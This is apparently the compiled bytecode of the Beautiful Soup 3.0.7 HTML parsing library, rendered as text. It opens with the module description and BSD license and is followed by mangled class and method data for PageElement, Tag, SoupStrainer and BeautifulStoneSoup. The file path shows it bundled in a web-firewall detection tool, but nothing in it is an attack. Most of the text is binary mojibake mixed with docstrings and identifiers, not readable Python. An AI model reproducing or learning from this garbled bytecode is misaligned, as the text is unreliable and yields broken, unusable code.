parse tree in the face of common HTML errors. Beautiful Soup also defines a class (UnicodeDammit) for autodetecting the encoding of an HTML or XML document, and converting it to Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser. For more than you ever wanted to know about Beautiful Soup, see the documentation: http://www.crummy.com/software/BeautifulSoup/documentation.html Here, have some legalese: Copyright (c) 2004-2008, Leonard Richardson All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the the Beautiful Soup Consortium and All Night Kosher Bakery nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. iˇˇˇˇ(t generatorss*Leonard Richardson (leonardr@segfault.org)s3.0.7as*Copyright (c) 2004-2008 Leonard Richardsons New-style BSD(t SGMLParsertSGMLParseErrorN(tname2codepoint(tSets[a-zA-Z][-_.:a-zA-Z0-9]*s-zA-Z][-_.:a-zA-Z0-9]*\s*sutf-8t PageElementcBsveZdZdddÑZdÑZdÑZdÑZdÑZdÑZ dhddÑZ dhdddÑZ dhdd ÑZ dhddd ÑZ e Zdhdd ÑZdhddd ÑZeZdhdd ÑZdhdddÑZeZdhdÑZdhddÑZeZdÑZdÑZdÑZdÑZdÑZdÑZdÑZddÑZddÑZ RS(seContains the navigational information for some part of the page (either a tag or a piece of text)cCsk||_||_d|_d|_d|_|io0|iio#|iid|_||i_ndS(sNSets up the initial relations between this element and other elements.iˇˇˇˇN(tparenttprevioustNonetnexttpreviousSiblingt nextSiblingtcontents(tselfRR((s%/pentest/waffit/libs/BeautifulSoup.pytsetupqs     cCsö|i}|iii|É}t|dÉoN|i|ijo;|iii|É}|o||jo|d}q|n|iÉ|i||ÉdS(NRi(RR tindexthasattrtextracttinsert(R t replaceWitht oldParenttmyIndexR((s%/pentest/waffit/libs/BeautifulSoup.pyR}s # cCsÍ|io1y|iii|ÉWq;tj oq;Xn|iÉ}|i}|io||i_n|o|i|_nd|_d|_d|_|io|i |i_ n|i o|i|i _nd|_|_ |S(s0Destructively rips this element out of the tree.N( RR tremovet ValueErrort_lastRecursiveChildR RRR R (R t lastChildt nextElement((s%/pentest/waffit/libs/BeautifulSoup.pyRãs(          cCs9|}x,t|dÉo|io|id}q W|S(s8Finds the last element beneath this object to be parsed.R iˇˇˇˇ(RR (R R((s%/pentest/waffit/libs/BeautifulSoup.pyR®s c Cs<t|tÉpt|tÉo!t|tÉ ot|É}nt|t|iÉÉ}t|dÉoc|idjoS|i|jo5|i |É}|o||jo|d}qæn|i Én||_d}|djod|_ ||_ n6|i|d}||_ ||i _|iÉ|_ |i o||i _n|iÉ}|t|iÉjocd|_|}d}x*|p"|i}|i}|pPqáqáW|o ||_q d|_n:|i|}||_|io||i_ n||_|io||i_ n|ii||ÉdS(NRii(t isinstancet basestringtunicodetNavigableStringtmintlenR RRRtfindRR RR RR R( R tpositiontnewChildRt previousChildtnewChildsLastElementRtparentsNextSiblingt nextChild((s%/pentest/waffit/libs/BeautifulSoup.pyRØsX                    cCs|it|iÉ|ÉdS(s2Appends the given tag to the contents of this tag.N(RR R (R ttag((s%/pentest/waffit/libs/BeautifulSoup.pytappendÎscKs|i|i||||çS(sjReturns the first item that matches the given criteria and appears after this Tag in the document.(t_findOnet findAllNext(R tnametattrsttexttkwargs((s%/pentest/waffit/libs/BeautifulSoup.pytfindNextÔscKs|i|||||i|çS(sbReturns all items that match the given criteria and appear after this Tag in the document.(t_findAllt nextGenerator(R R,R-R.tlimitR/((s%/pentest/waffit/libs/BeautifulSoup.pyR+ÙscKs|i|i||||çS(s{Returns the closest sibling to this Tag that matches the given criteria and appears after this Tag in the document.(R*tfindNextSiblings(R R,R-R.R/((s%/pentest/waffit/libs/BeautifulSoup.pytfindNextSibling˚scKs|i|||||i|çS(sqReturns the siblings of this Tag that match the given criteria and appear after this Tag in the document.(R1tnextSiblingGenerator(R R,R-R.R3R/((s%/pentest/waffit/libs/BeautifulSoup.pyR4scKs|i|i||||çS(skReturns the first item that matches the given criteria and appears before this Tag in the document.(R*tfindAllPrevious(R R,R-R.R/((s%/pentest/waffit/libs/BeautifulSoup.pyt findPrevious scKs|i|||||i|çS(scReturns all items that match the given criteria and appear before this Tag in the document.(R1tpreviousGenerator(R R,R-R.R3R/((s%/pentest/waffit/libs/BeautifulSoup.pyR7scKs|i|i||||çS(s|Returns the closest sibling to this Tag that matches the given criteria and appears before this Tag in the document.(R*tfindPreviousSiblings(R R,R-R.R/((s%/pentest/waffit/libs/BeautifulSoup.pytfindPreviousSiblingscKs|i|||||i|çS(srReturns the siblings of this Tag that match the given criteria and appear before this Tag in the document.(R1tpreviousSiblingGenerator(R R,R-R.R3R/((s%/pentest/waffit/libs/BeautifulSoup.pyR:scKs4d}|i||dÉ}|o|d}n|S(sOReturns the closest parent of this Tag that matches the given criteria.iiN(Rt findParents(R R,R-R/trtl((s%/pentest/waffit/libs/BeautifulSoup.pyt findParent$s cKs|i||d||i|çS(sFReturns the parents of this Tag that match the given criteria.N(R1RtparentGenerator(R R,R-R3R/((s%/pentest/waffit/libs/BeautifulSoup.pyR=/scKs7d}||||d|ç}|o|d}n|S(Nii(R(R tmethodR,R-R.R/R>R?((s%/pentest/waffit/libs/BeautifulSoup.pyR*9s c Ksœt|tÉo |}nt||||ç}t|É}|É} xÑto|y| iÉ} Wntj oPnX| oJ|i| É} | o0|i| É|ot|É|joPq¬q∆qGqGW|S(s8Iterates over a generator looking for things that match.( Rt SoupStrainert ResultSettTrueR t StopIterationtsearchR)R ( R R,R-R.R3t generatorR/tstrainertresultstgtitfound((s%/pentest/waffit/libs/BeautifulSoup.pyR1@s$    ccs'|}x|o|i}|Vq WdS(N(R (R RL((s%/pentest/waffit/libs/BeautifulSoup.pyR2Ys  ccs'|}x|o|i}|Vq WdS(N(R (R RL((s%/pentest/waffit/libs/BeautifulSoup.pyR6_s  ccs'|}x|o|i}|Vq WdS(N(R(R RL((s%/pentest/waffit/libs/BeautifulSoup.pyR9es  ccs'|}x|o|i}|Vq WdS(N(R (R RL((s%/pentest/waffit/libs/BeautifulSoup.pyR<ks  ccs'|}x|o|i}|Vq WdS(N(R(R RL((s%/pentest/waffit/libs/BeautifulSoup.pyRAqs  cCs|pd}|id|ÉS(Nsutf-8s%SOUP-ENCODING%(treplace(R tstrtencoding((s%/pentest/waffit/libs/BeautifulSoup.pytsubstituteEncodingxs cCsõt|tÉo|o|i|É}qónjt|tÉo*|o|i|É}qót|É}n0|o|it|É|É}n t|É}|S(sHEncodes an object to a string in some encoding, or to Unicode. .(RRtencodeROt toEncoding(R tsRP((s%/pentest/waffit/libs/BeautifulSoup.pyRS|s N(!t__name__t __module__t__doc__RRRRRRR)R0R+R5R4tfetchNextSiblingsR8R7t fetchPreviousR;R:tfetchPreviousSiblingsR@R=t fetchParentsR*R1R2R6R9R<RARQRS(((s%/pentest/waffit/libs/BeautifulSoup.pyRms>    <            RcBs8eZdÑZdÑZdÑZdÑZedÑZRS(cCs4t|tÉoti||ÉSti||tÉS(s-Create a new NavigableString. When unpickling a NavigableString, this method is called with the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be passed in to the superclass's __new__ or the superclass won't know how to handle non-ASCII characters. (RRt__new__tDEFAULT_OUTPUT_ENCODING(tclstvalue((s%/pentest/waffit/libs/BeautifulSoup.pyR\êscCsti|ÉfS(N(Rt__str__(R ((s%/pentest/waffit/libs/BeautifulSoup.pyt__getnewargs__úscCs/|djo|Std|ii|fÇdS(s™text.string gives you text. This is for backwards compatibility for Navigable*String, but for CData* it lets you get the string without the CData wrapper.tstrings!'%s' object has no attribute '%s'N(tAttributeErrort __class__RU(R tattr((s%/pentest/waffit/libs/BeautifulSoup.pyt __getattr__üs cCst|ÉitÉS(N(ROtdecodeR](R ((s%/pentest/waffit/libs/BeautifulSoup.pyt __unicode__®scCs|o|i|ÉS|SdS(N(RR(R RP((s%/pentest/waffit/libs/BeautifulSoup.pyR`´s(RURVR\RaRfRhR]R`(((s%/pentest/waffit/libs/BeautifulSoup.pyRés   tCDatacBseZedÑZRS(cCsdti||ÉS(Ns<![CDATA[%s]]>(RR`(R RP((s%/pentest/waffit/libs/BeautifulSoup.pyR`≥s(RURVR]R`(((s%/pentest/waffit/libs/BeautifulSoup.pyRi±stProcessingInstructioncBseZedÑZRS(cCs=|}d|jo|i||É}nd|i||ÉS(Ns%SOUP-ENCODING%s<?%s?>(RQRS(R RPtoutput((s%/pentest/waffit/libs/BeautifulSoup.pyR`∑s (RURVR]R`(((s%/pentest/waffit/libs/BeautifulSoup.pyRj∂stCommentcBseZedÑZRS(cCsdti||ÉS(Ns <!--%s-->(RR`(R RP((s%/pentest/waffit/libs/BeautifulSoup.pyR`æs(RURVR]R`(((s%/pentest/waffit/libs/BeautifulSoup.pyRlΩst DeclarationcBseZedÑZRS(cCsdti||ÉS(Ns<!%s>(RR`(R RP((s%/pentest/waffit/libs/BeautifulSoup.pyR`¬s(RURVR]R`(((s%/pentest/waffit/libs/BeautifulSoup.pyRm¡stTagcBsŒeZdZdÑZhdd6dd6dd6dd 6d d 6ZeeÉZd ÑZd-d-d-d ÑZd-dÑZ dÑZ dÑZ dÑZ dÑZ dÑZdÑZdÑZdÑZdÑZdÑZdÑZdÑZedÑZdÑZeidddÉZd ÑZeed!d"ÑZd#ÑZed$ÑZ eed!d%ÑZ!d-he"d-d&ÑZ#e#Z$d-he"d-d-d'ÑZ%e%Z&e#Z'e%Z(d-e"d-d(ÑZ)d-e"d)ÑZ*d*ÑZ+d+ÑZ,d,ÑZ-RS(.s=Represents a found HTML tag with its attributes and contents.cCs1h}x$|iÉD]\}}|||<qW|S(s Cheap function to invert a hash.(titems(thRLtktv((s%/pentest/waffit/libs/BeautifulSoup.pyt_invert…s  t'tapost"tquott&tampt<tltt>tgtcCs˛|idÉ}|io|tjott|ÉS||ijo"|io |i|Sd|Snît|Édjoe|ddjoTt|Édjo)|ddjott|ddÉÉStt|dÉÉSn|io d|Sd|Sd S( s—Used in a call to re.sub to replace HTML, XML, and numeric entities with the appropriate Unicode characters. If HTML entities are being converted, any unrecognized entities are escaped.iu&%s;it#txiiu&amp;%s;N( tgrouptconvertHTMLEntitiesRtunichrtXML_ENTITIES_TO_SPECIAL_CHARStconvertXMLEntitiesR tinttescapeUnrecognizedEntities(R tmatchR((s%/pentest/waffit/libs/BeautifulSoup.pyt_convertEntitiesÿs   $$  csæ|ià_|i|Éà_|à_|djo g}n|à_gà_ài||Ét à_ t à_ |i à_ |i à_ |ià_áfdÜ}t|àiÉà_dS(sBasic constructor.cs(|\}}|tidài|ÉfS(s&(#\d+|#x[0-9a-fA-F]+|\w+);(tretsubRà(t.0Rqtval(R (s%/pentest/waffit/libs/BeautifulSoup.pyt<lambda>s  N(Rdt parserClasstisSelfClosingTagt isSelfClosingR,RR-R RtFalsethiddentcontainsSubstitutionsRÅRÑRÜtmap(R tparserR,R-RRtconvert((R s%/pentest/waffit/libs/BeautifulSoup.pyt__init__Òs           cCs|iÉi||ÉS(sâReturns the value of the 'key' attribute for the tag, or the value given for 'default' if it doesn't have that attribute.(t _getAttrMaptget(R tkeytdefault((s%/pentest/waffit/libs/BeautifulSoup.pyRô scCs|iÉi|ÉS(N(Ròthas_key(R Rö((s%/pentest/waffit/libs/BeautifulSoup.pyRúscCs|iÉ|S(sqtag[key] returns the value of the 'key' attribute for the tag, and throws an exception if it's not there.(Rò(R Rö((s%/pentest/waffit/libs/BeautifulSoup.pyt __getitem__scCs t|iÉS(s0Iterating over a tag iterates over its contents.(titerR (R ((s%/pentest/waffit/libs/BeautifulSoup.pyt__iter__scCs t|iÉS(s:The length of a tag is the length of its list of contents.(R R (R ((s%/pentest/waffit/libs/BeautifulSoup.pyt__len__scCs ||ijS(N(R (R R((s%/pentest/waffit/libs/BeautifulSoup.pyt __contains__"scCstS(s-A tag is non-None even if it has no contents.(RE(R ((s%/pentest/waffit/libs/BeautifulSoup.pyt __nonzero__%scCs™|iÉ||i|<t}xUtdt|iÉÉD];}|i|d|jo||f|i|<t}q6q6W|p|ii||fÉn||iÉ|<dS(sKSetting tag[key] sets the value of the 'key' attribute for the tag.iN(RòtattrMapRëtrangeR R-RER)(R RöR_RMRL((s%/pentest/waffit/libs/BeautifulSoup.pyt __setitem__)s  cCshxa|iD]V}|d|jo|ii|Én|iÉ|ii|Éo|i|=q q WdS(s;Deleting tag[key] deletes all 'key' attributes for the tag.iN(R-RRòR£Rú(R Rötitem((s%/pentest/waffit/libs/BeautifulSoup.pyt __delitem__7s  cOst|i||ÉS(süCalling a tag like a function is the same as calling its findAll() method. Eg. tag('a') returns a list of all the A tags found within this tag.(tapplytfindAll(R targsR/((s%/pentest/waffit/libs/BeautifulSoup.pyt__call__BscCsÉt|Édjo2|idÉt|Édjo|i|d ÉS|idÉdjo|i|ÉStd|i|fÇdS(NiRni˝ˇˇˇt__is!'%s' object has no attribute '%s'(R trfindR!RcRd(R R(((s%/pentest/waffit/libs/BeautifulSoup.pyRfHs 3cCsæt|dÉ pat|dÉ pPt|dÉ p?|i|ijp,|i|ijpt|Ét|ÉjotSx@tdt|iÉÉD]&}|i||i|jotSqêWtS(sReturns true iff this tag has the same name, the same attributes, and the same contents (recursively) as the given tag. NOTE: right now this will return false if two tags have the same attributes in a different order. Should this be fixed?R,R-R i(RR,R-R RëR§R RE(R totherRL((s%/pentest/waffit/libs/BeautifulSoup.pyt__eq__Psr cCs ||j S(sZReturns true iff this tag is not identical to the other tag, as defined in __eq__.((R RÆ((s%/pentest/waffit/libs/BeautifulSoup.pyt__ne__]scCs |i|ÉS(sRenders this tag as a string.(R`(R RP((s%/pentest/waffit/libs/BeautifulSoup.pyt__repr__bscCs |idÉS(N(R`R(R ((s%/pentest/waffit/libs/BeautifulSoup.pyRhfss([<>]|s&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)t)cCs d|i|idÉddS(smUsed with a regular expression to substitute the appropriate XML entity for an XML special character.Rxit;(tXML_SPECIAL_CHARS_TO_ENTITIESRÄ(R R((s%/pentest/waffit/libs/BeautifulSoup.pyt _sub_entitymsicCs©|i|i|É}g}|io„x‡|iD]—\}}d}t|ÉoÉ|io#d|jo|i||É}nd|jo-d}d|jo|iddÉ}qµn|ii|i |É}n|i ||i||É|i||ÉfÉq/Wnd} d} |i o d} n d |} d\} } |o"|} d | d } | d } n|i ||| É}|i o |}ng}d}|od d i|É}n|o|i | Én|i d ||| fÉ|o|i dÉn|i |É|o)|o"|ddjo|i dÉn|o| o|i | Én|i | É|o"| o|io|i dÉndi|É}|S(sReturns a string or Unicode representation of this tag and its contents. To get Unicode, pass None for encoding. NOTE: since Python's HTML parser consumes whitespace, this method is not certain to reproduce the whitespace present in the original string.s%s="%s"s%SOUP-ENCODING%Rvs%s='%s'Rts&squot;ts /s</%s>it is<%s%s%s>s iˇˇˇˇ(ii(RSR,R-tisStringRìRQRNtBARE_AMPERSAND_OR_BRACKETRäRµR)RêtrenderContentsRítjoinR (R RPt prettyPrintt indentLevelt encodedNameR-RöRåtfmttclosetcloseTagt indentTagtindentContentstspaceR RTtattributeString((s%/pentest/waffit/libs/BeautifulSoup.pyR`rs`              cCskg}|iD] }||q~}x6|D].}t|tÉo|iÉq+|iÉq+W|iÉdS(s/Recursively destroys the contents of this tree.N(R RRnt decomposeR(R t_[1]RLR ((s%/pentest/waffit/libs/BeautifulSoup.pyR∆«s$cCs|i|tÉS(N(R`RE(R RP((s%/pentest/waffit/libs/BeautifulSoup.pytprettify—scCsÎg}x’|D]Õ}d}t|tÉo|i|É}n1t|tÉo |i|i|||ÉÉn|o|o|iÉ}n|oI|o|id|dÉn|i|É|o|idÉq⁄q q Wdi|ÉS(s{Renders the contents of this tag as a string in the given encoding. If encoding is None, returns a Unicode string..R∑is R∂N(RRRR`RnR)tstripRª(R RPRºRΩRTtcR.((s%/pentest/waffit/libs/BeautifulSoup.pyR∫‘s"  cKs=d}|i||||d|ç}|o|d}n|S(sLReturn only the first child of this Tag matching the given criteria.iiN(RR©(R R,R-t recursiveR.R/R>R?((s%/pentest/waffit/libs/BeautifulSoup.pyR!Îs cKs9|i}|p |i}n|i||||||çS(s’Extracts a list of Tag objects that match the given criteria. You can specify the name of the Tag and any attributes you want the Tag to have. The value of a key-value pair in the 'attrs' map can be a string, a list of strings, a regular expression object, or a callable that takes a string and returns whether or not the string matches for some custom definition of 'matches'. The same is true of the tag name.(trecursiveChildGeneratortchildGeneratorR1(R R,R-RÀR.R3R/RH((s%/pentest/waffit/libs/BeautifulSoup.pyR©ˆs  cCs|id|d|d|ÉS(NR.RÀR3(R©(R R.RÀR3((s%/pentest/waffit/libs/BeautifulSoup.pyt fetchText scCs|id|d|ÉS(NR.RÀ(R!(R R.RÀ((s%/pentest/waffit/libs/BeautifulSoup.pyt firstTextscCsKt|dÉp4h|_x(|iD]\}}||i|<q#Wn|iS(s^Initializes a map representation of this tag's attributes, if not already initialized.R£(tgetattrR£R-(R RöR_((s%/pentest/waffit/libs/BeautifulSoup.pyRòs   ccs9x,tdt|iÉÉD]}|i|VqWtÇdS(Ni(R§R R RF(R RL((s%/pentest/waffit/libs/BeautifulSoup.pyRÕsccsÍ|dfg}xŒ|o∆|iÉ\}}t|tÉo†xùt|t|iÉÉD]}|i|}|Vt|tÉoW|ioM|t|iÉdjo|i||dfÉn|i|dfÉPqTqTWqqWtÇdS(Nii(tpopRRnR§R R R)RF(R tstackR(tstartRLta((s%/pentest/waffit/libs/BeautifulSoup.pyRÃ"s N(.RURVRWRsRÉR¥RàRRóRôRúRùRüR†R°R¢R•RßR´RfRØR∞R]R±RhRâtcompileRπRµRëR`R∆R»R∫RER!t findChildR©t findChildrentfirsttfetchRŒRœRòRÕRÃ(((s%/pentest/waffit/libs/BeautifulSoup.pyRn≈s^                    T     RCcBsJeZdZdhddÑZdÑZdhdÑZdÑZdÑZRS(sMEncapsulates a number of ways of matching a markup element (tag or text).cKsu||_t|Éo||d<d}n|o.|o|iÉ}|i|Éq_|}n||_||_dS(Ntclass(R,R∏RtcopytupdateR-R.(R R,R-R.R/((s%/pentest/waffit/libs/BeautifulSoup.pyRó6s       cCs*|io|iSd|i|ifSdS(Ns%s|%s(R.R,R-(R ((s%/pentest/waffit/libs/BeautifulSoup.pyR`Ds c CsÖd}d}t|tÉo|}|}nt|iÉot|tÉ }|i pB|p;|o|i||iÉp| o˛|i||iÉoË|o|i||É}n¶t}d}xñ|iiÉD]Ö\}} |pEt |dÉo |}q*h}x"|D]\} } | || <q Wn|i |É} |i| | Ép t }Pq“q“W|o|o |}q}|}qÅn|S(NRô( RRRntcallableR,t_matchesRER-RoRRôRë( R t markupNamet markupAttrsRMtmarkuptcallFunctionWithTagDataRát markupAttrMapRet matchAgainstRqRrt attrValue((s%/pentest/waffit/libs/BeautifulSoup.pyt searchTagJsB       cCsÍd}t|ÉoQt|tÉ o@xø|D]1}t|tÉo|i|Éo |}Pq+q+WnÉt|tÉo!|ip|i|É}qÊnRt|tÉp t|Éo$|i ||iÉo |}qÊnt d|i Ç|S(Ns&I don't know how to match against a %s( RtisListRRnRRGR.RÊR∏Rfit ExceptionRd(R R·RMtelement((s%/pentest/waffit/libs/BeautifulSoup.pyRGos$    cCsat}|tjo&t|Étijo|dj}n%t|Éo||É}nt|tÉo |i }n|ot |É ot |É}nt |dÉo|o |i |É}nÖt|Éo||j}nht |dÉo|i|É}nE|o=t |Éo0t|t Éot |É}qFt|É}n|p||j}n|S(NRáRo(RëREttypettypest BooleanTypeRR›RRnR,R∏RRRGRÁRúRO(R R·R‰tresult((s%/pentest/waffit/libs/BeautifulSoup.pyRfiâs,#   N( RURVRWRRóR`RÊRGRfi(((s%/pentest/waffit/libs/BeautifulSoup.pyRC2s  % RDcBseZdZdÑZRS(sTA ResultSet is just a list that keeps track of the SoupStrainer that created it.cCstigÉ||_dS(N(tlistRótsource(R RÔ((s%/pentest/waffit/libs/BeautifulSoup.pyRó¨s (RURVRWRó(((s%/pentest/waffit/libs/BeautifulSoup.pyRD©scCs,t|dÉpt|ÉtitifjS(stConvenience method that works with all 2.x versions of Python to determine whether or not something is listlike.Rü(RRÍRÎtListTypet TupleType(R?((s%/pentest/waffit/libs/BeautifulSoup.pyRÁ≤scCsEy!t|tÉp t|tÉSWntj ot|tÉSXdS(svConvenience method that works with all 2.x versions of Python to determine whether or not something is stringlike.N(RRRt NameErrorRO(RT((s%/pentest/waffit/libs/BeautifulSoup.pyR∏∏s!cGsåh}x|D]w}t|dÉo+x^|iÉD]\}}|||<q0Wq t|Éox&|D]}|||<qbWq |||<q W|S(s±Turns a list of maps, lists, or scalars into a single map. Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and NESTING_RESET_TAGS maps out of lists and partial maps.Ro(RRoRÁ(RõR™tbuilttportionRqRr((s%/pentest/waffit/libs/BeautifulSoup.pyt buildTagMap¿s  tBeautifulStoneSoupc BsáeZdZhZhZhZhZgZei dÉdÑfei dÉdÑfgZ dZ dZ dZ dZeZhd%d 6d%d 6d%d 6d%d 6d%d 6Zdd%d%ee d%d%edÑZdÑZd%edÑZdÑZdÑZdÑZdÑZdÑZedÑZedÑZdÑZddÑZ dÑZ!dÑZ"dÑZ#dÑZ$d ÑZ%d!ÑZ&d"ÑZ'd#ÑZ(d$ÑZ)RS(&sbThis class contains the basic parser and search code. It defines a parser that knows nothing about tag behavior except for the following: You can't close a tag without closing all the tags it encloses. That is, "<foo><bar></foo>" actually means "<foo><bar></bar></foo>". [Another possible explanation is "<foo><bar /></foo>", but since this class defines no SELF_CLOSING_TAGS, it will never use that explanation.] This class is useful for parsing XML or made-up markup languages, or when BeautifulSoup makes an assumption counter to what you were expecting.s (<[^<>]*)/>cCs|idÉdS(is />(RÄ(R((s%/pentest/waffit/libs/BeautifulSoup.pyRçÓss<!\s+([^<>]*)>cCsd|idÉdS(s<!iR|(RÄ(R((s%/pentest/waffit/libs/BeautifulSoup.pyRçsu [document]thtmltxmltxhtmli i i i i R∂c Csk||_||_||_||_|ioöd|_||ijot|_t|_ t|_ q„||i jot|_t|_ t|_ q„||i jot|_t|_ t|_ q„nt|_t|_ t|_ t d|É|_ti|Ét|dÉo|iÉ}n||_||_y|id|ÉWntj onXd|_dS(sVThe Soup object is initialized as the 'root tag', and the provided markup (which can be a string or a file-like object) is fed into the underlying parser. sgmllib will process most bad HTML, and the BeautifulSoup class has some tricks for dealing with some HTML that kills sgmllib, but Beautiful Soup can nonetheless choke or lose data if your data uses self-closing tags or declarations incorrectly. By default, Beautiful Soup uses regexes to sanitize input, avoiding the vast majority of these problems. If the problems don't apply to you, pass in False for markupMassage, and you'll get better performance. The default parser massage techniques fix the two most common instances of invalid HTML that choke sgmllib: <br/> (No space between name of closing tag and tag close) <! --Comment--> (Extraneous whitespace in declaration) You can pass in a custom list of (RE object, replace method) tuples to get Beautiful Soup to scrub your input the way you want.treadtisHTMLN(tparseOnlyTheset fromEncodingt smartQuotesTotconvertEntitiesRt HTML_ENTITIESRëRÑRERÅRÜtXHTML_ENTITIESt XML_ENTITIESRıtinstanceSelfClosingTagsRRóRR˙R·t markupMassaget_feedt StopParsing( R R·R¸R˝RR˛RˇtselfClosingTagsR˚((s%/pentest/waffit/libs/BeautifulSoup.pyRós@                    cCsWyt|É}Wntj odSXd|jo djnpdS|i|ÉS(s/This method fixes a bug in Python's SGMLParser.Nii(RÖRtconvert_codepoint(R R,tn((s%/pentest/waffit/libs/BeautifulSoup.pytconvert_charrefFscCs=|i}t|tÉo!t|dÉp d|_qÇnIt||i|gd|id|É}|i}|i|_|i |_ |od|i oVt |i Ép|i |_ nx)|i D]\}}|i ||É}qΩW|` qÌn|iÉti||É|iÉx%|ii|ijo|iÉqWdS(NtoriginalEncodingR˛R˚(R·RRRRR t UnicodeDammitR˝R˛tdeclaredHTMLEncodingRRÁtMARKUP_MASSAGERätresetRtfeedtendDatat currentTagR,t ROOT_TAG_NAMEtpopTag(R tinDocumentEncodingR˚R·tdammittfixtm((s%/pentest/waffit/libs/BeautifulSoup.pyRPs0        cCsÑ|idÉdjp,|idÉdjp|idÉdjoti||ÉS|idÉdjoti||ÉStÇdS(sàThis method routes method call requests to either the SGMLParser superclass or the Tag superclass, depending on the method name.tstart_itend_tdo_R¨N(R!RRfRnRc(R t methodName((s%/pentest/waffit/libs/BeautifulSoup.pyRfqs ,cCs#|ii|Ép|ii|ÉS(seReturns true iff the given string is the name of a self-closing tag according to this parser.(tSELF_CLOSING_TAGSRúR(R R,((s%/pentest/waffit/libs/BeautifulSoup.pyRè~scCsati|||iÉd|_ti|Ég|_d|_g|_ g|_ |i |ÉdS(Ni( RnRóRRíRRt currentDataRRttagStackt quoteStacktpushTag(R ((s%/pentest/waffit/libs/BeautifulSoup.pyRÑs      cCsÅ|iiÉ}t|iiÉdjo4t|iidtÉo|iid|i_n|io|id|_n|iS(Niiiˇˇˇˇ(RR—R RR RRRb(R R(((s%/pentest/waffit/libs/BeautifulSoup.pyRés cCsE|io|iii|Én|ii|É|id|_dS(Niˇˇˇˇ(RR R)R(R R(((s%/pentest/waffit/libs/BeautifulSoup.pyR!ús cCsA|io3di|iÉ}|i|iÉdjo\tg}|iD]}||iqF~Éi|iÉ o!d|jo d}qëd}ng|_|i o=t |iÉdjo'|i i p|i i |É odS||É}|i |i|iÉ|io||i_n||_|iii|ÉndS(NuR∂s R∑i(RRªt translatetSTRIP_ASCII_SPACEStsetRR,t intersectiontPRESERVE_WHITESPACE_TAGSR¸R R.RGRRRR R R)(R tcontainerClassRR«R(to((s%/pentest/waffit/libs/BeautifulSoup.pyR£s& -        cCsπ||ijodSd}d}xVtt|iÉdddÉD]5}||i|ijot|iÉ|}PqAqAW|p|d}nx#td|ÉD]}|iÉ}qüW|S(s‹Pops the tag stack up to and including the most recent instance of the given tag. If inclusivePop is false, pops the tag stack up to but *not* including the most recent instqance of the given tag.Niiiˇˇˇˇ(RRR§R RR,R(R R,t inclusivePoptnumPopst mostRecentTagRL((s%/pentest/waffit/libs/BeautifulSoup.pyt _popToTag∫s  c Cs!|ii|É}|dj}|ii|É}d}t}x√tt|iÉdddÉD]¢}|i|}| p|i |jo| o |}Pn|djo|i |jp*|djo1|o*|ii|i Éo|i }t }Pn|i }q\W|o|i ||ÉndS(sÙWe need to pop up to the previous tag of this type, unless one of this tag's nesting reset triggers comes between this tag and the previous tag of this type, OR unless this tag is a generic nesting trigger and another generic nesting trigger comes between this tag and the previous tag of this type. Examples: <p>Foo<b>Bar *<p>* should pop to 'p', not 'b'. <p>Foo<table>Bar *<p>* should pop to 'table', not 'p'. <p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'. <li><ul><li> *<li>* should pop to 'ul', not the first 'li'. <tr><table><tr> *<tr>* should pop to 'table', not the first 'tr' <td><tr><td> *<td>* should pop to 'tr', not the first 'td' iiiˇˇˇˇN( t NESTABLE_TAGSRôRtRESET_NESTING_TAGSRúRER§R RR,RëRR,( R R,tnestingResetTriggerst isNestabletisResetNestingtpopTot inclusiveRLtp((s%/pentest/waffit/libs/BeautifulSoup.pyt _smartPop–s*       icCsb|io7ditdÑ|ÉÉ}|id||fÉdS|iÉ|i|É o| o|i|Én|io?t|i Édjo)|ii p|ii ||É odSt ||||i |iÉ}|io||i_n||_|i|É|p|i|Éo|iÉn||ijo|ii|Éd|_n|S(NR∂cSs|\}}d||fS(s %s="%s"((RãRty((s%/pentest/waffit/libs/BeautifulSoup.pyRçss<%s%s>i(R RªRît handle_dataRRèR5R¸R RR.RÊRnRRR R!Rt QUOTE_TAGSR)tliteral(R R,R-t selfClosingR(((s%/pentest/waffit/libs/BeautifulSoup.pytunknown_starttag˛s*   $    cCsñ|io*|id|jo|id|ÉdS|iÉ|i|É|io=|id|jo)|iiÉt|iÉdj|_ndS(Niˇˇˇˇs</%s>i(R R7RR,R—R R9(R R,((s%/pentest/waffit/libs/BeautifulSoup.pytunknown_endtags   cCs|ii|ÉdS(N(RR)(R tdata((s%/pentest/waffit/libs/BeautifulSoup.pyR7)scCs(|iÉ|i|É|i|ÉdS(sOAdds a certain piece of text to the tree as a NavigableString subclass.N(RR7(R R.tsubclass((s%/pentest/waffit/libs/BeautifulSoup.pyt_toStringSubclass,s  cCs/|d djo d}n|i|tÉdS(s©Handle a processing instruction as a ProcessingInstruction object, possibly one with a %SOUP-ENCODING% slot into which an encoding will be plugged later.iR¯u,xml version='1.0' encoding='%SOUP-ENCODING%'N(R?Rj(R R.((s%/pentest/waffit/libs/BeautifulSoup.pyt handle_pi3s cCs|i|tÉdS(s#Handle comments as Comment 